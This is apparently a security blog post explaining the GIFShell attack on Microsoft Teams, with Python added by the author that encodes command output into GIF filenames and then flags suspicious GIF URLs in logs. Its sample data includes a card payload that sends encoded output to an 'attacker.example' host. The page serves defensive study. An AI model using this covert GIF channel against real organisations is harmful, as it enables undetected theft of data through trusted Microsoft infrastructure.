A recently published attack technique abuses a chain of flaws in Microsoft Teams. The technique, known as the GIFShell attack, lets threat actors execute commands on a compromised endpoint and exfiltrate data using GIFs. This blog post delves into the details of the technique, its implications, and the response from Microsoft.
What is the GIFShell Attack?
The GIFShell attack is a novel technique that allows threat actors to abuse Microsoft Teams for phishing and for covertly executing commands and stealing data using GIFs. Rather than relying on a single bug, it chains a series of vulnerabilities and design flaws in Microsoft Teams, using the platform’s legitimate infrastructure to deliver malicious files and commands and exfiltrating data through GIFs. Because the exfiltration passes through Microsoft’s own servers, it is hard to distinguish from legitimate Microsoft Teams traffic, and network security tooling that trusts Microsoft domains is unlikely to flag it.
How Does the GIFShell Attack Work?
The main component of the GIFShell attack is a reverse shell that delivers commands as base64-encoded text embedded in GIFs sent through Teams, and exfiltrates the command output through GIF URLs that Microsoft’s own infrastructure retrieves. The attacker first convinces a user to install a malicious stager, which is what executes commands and uploads their output, encoded in a GIF URL, to a Microsoft Teams webhook. The stager continuously scans the Microsoft Teams log files on disk for messages containing a GIF, extracts the base64-encoded commands, and executes them on the device. The output of each command is then base64-encoded and used as the filename of a remote GIF embedded in a Microsoft Teams Survey Card, which the stager submits to the attacker’s public Microsoft Teams webhook. When Microsoft’s servers render the card, they fetch that GIF from the attacker-controlled server, so the attacker can read the encoded output out of their own server’s request logs; the victim endpoint never talks to the attacker directly.
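Because the victim endpoint never contacts the attacker directly, the most visible artifact a defender has is the GIF URL itself: a filename that is really base64-encoded command output. The Python below is an added example, not code from the original research or from Microsoft, that demonstrates both halves of that channel: encoding output into a GIF filename the way the text describes, and a detection heuristic that scans log-style lines for GIF URLs whose filename decodes to mostly printable text. The sample lines, the host names and the choice of URL-safe base64 without padding are all assumptions made for the example; the page does not state the exact alphabet the original tooling used.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Assumption for this example: output is URL-safe base64 with padding
# stripped, so it survives as a path segment without escaping.
def encode_output_as_gif_name(output: bytes) -> str:
    """Mirror of the exfiltration channel: command output -> base64 -> GIF filename."""
    stem = base64.urlsafe_b64encode(output).decode("ascii").rstrip("=")
    return stem + ".gif"


# A plausible base64 stem: only alphabet characters (both standard and
# URL-safe), at least 8 of them, optional trailing padding.
_B64_STEM = re.compile(r"^[A-Za-z0-9+/_-]{8,}={0,2}$")
# Any http(s) URL ending in .gif, as it would appear in a proxy log or in
# the image field of a card payload.
_GIF_URL = re.compile(r"https?://[^\s\"'<>)]+\.gif", re.IGNORECASE)


def _printable_ratio(raw: bytes) -> float:
    """Fraction of bytes that are printable ASCII, tab, newline or carriage return."""
    ok = sum(1 for b in raw if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(raw)


def decode_gif_name(url: str, threshold: float = 0.9):
    """Return the decoded payload if the GIF filename in `url` looks like
    base64 that decodes to mostly printable text, otherwise None."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    if not name.lower().endswith(".gif"):
        return None
    stem = name[:-4]
    if not _B64_STEM.match(stem):
        return None
    # Restore padding the sender may have stripped.
    padded = stem + "=" * (-len(stem) % 4)
    try:
        # urlsafe_b64decode maps -/_ to +// first, so it accepts both alphabets.
        raw = base64.urlsafe_b64decode(padded)
    except (ValueError, binascii.Error):
        return None
    if not raw or _printable_ratio(raw) < threshold:
        return None
    return raw


def find_suspicious_gif_urls(lines):
    """Scan text lines for GIF URLs whose filename decodes to printable text.
    Returns a list of (url, decoded_payload) pairs."""
    hits = []
    for line in lines:
        for url in _GIF_URL.findall(line):
            payload = decode_gif_name(url)
            if payload is not None:
                hits.append((url, payload))
    return hits


# Constructed sample lines (not real logs): two ordinary GIF fetches and one
# card payload whose image filename carries base64-encoded command output.
_EXFIL_NAME = encode_output_as_gif_name(b"DESKTOP-AB12\\alice\n")
SAMPLE_LINES = [
    "2024-01-01T10:00:01Z GET https://media.example.com/cats/funny-cat-01.gif 200",
    '{"type":"card","image":"https://attacker.example/' + _EXFIL_NAME + '"}',
    "2024-01-01T10:00:03Z GET https://cdn.example.com/images/4f2a9c.gif 200",
]

if __name__ == "__main__":
    for url, payload in find_suspicious_gif_urls(SAMPLE_LINES):
        print(f"possible exfiltration via {url}: {payload!r}")
```

This is a heuristic, not a signature: a short, innocuous filename can occasionally decode to printable bytes, so tune the minimum stem length and the printable threshold against your own traffic, and treat the destination as the stronger signal. A GIF referenced from a Teams card that is hosted on a domain your organisation has never seen before is worth a look regardless of what the filename decodes to.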
Implications of the GIFShell Attack
The GIFShell attack has serious implications for cybersecurity. Because the data leaves via Microsoft’s servers rather than through a direct connection to the attacker, it blends into legitimate Teams traffic and can evade network-based detection that trusts Microsoft domains. Furthermore, because Microsoft Teams runs as a background process, the user does not even need to have the application open for the attacker’s commands to be written to the log the stager reads. The same flaws can be used for phishing, with attackers able to send malicious files to Teams users while spoofing them to look like harmless images.
Microsoft’s Response to the GIFShell Attack
Microsoft has acknowledged the research into the GIFShell attack but stated that it would not be fixed immediately, as no security boundaries were bypassed. Microsoft noted that while the research was valuable, the issues identified were post-exploitation and relied on a target already being compromised. However, Microsoft left the door open to resolving these issues in future versions of its software.
As always, users are advised to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers. Because every step of the attack depends on the attacker first getting a stager running on the endpoint, the controls that prevent or detect that initial execution are the ones that actually break the chain.